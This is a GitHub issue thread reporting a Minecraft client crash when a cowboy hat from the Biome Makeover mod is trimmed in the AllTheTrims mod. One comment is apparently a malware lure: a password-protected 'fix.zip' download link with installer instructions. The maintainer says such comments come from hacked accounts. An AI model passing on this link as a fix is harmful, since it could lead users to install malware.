### ISSUE TITLE
crash when rendering cowboy hat from biome makeover

### ISSUE THREAD

**Issue by slovinsqui** [Benjamin-Norton/AllTheTrims#36]
It might be stupid to try to trim a cowboy hat but some unfortunate soul might try it and crash out of the game

the client crashes the moment they put the cowboy hat on the smithing table when there is already a trim, crashing the game

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bawnorton** [comment]
Please just upload the log directly to GitHub by dragging and dropping it into the comment box use mclogs

**Comment by Bawnorton** [comment]
<img width="870" alt="Screenshot 2024-08-27 at 12 37 05 PM" src="https://github.com/user-attachments/assets/1a514e5d-cf23-44af-8ae8-3613aac70c84">

apologies, there was a prior comment created by the wave of hacked gh accounts that I responded to and was then removed from gh
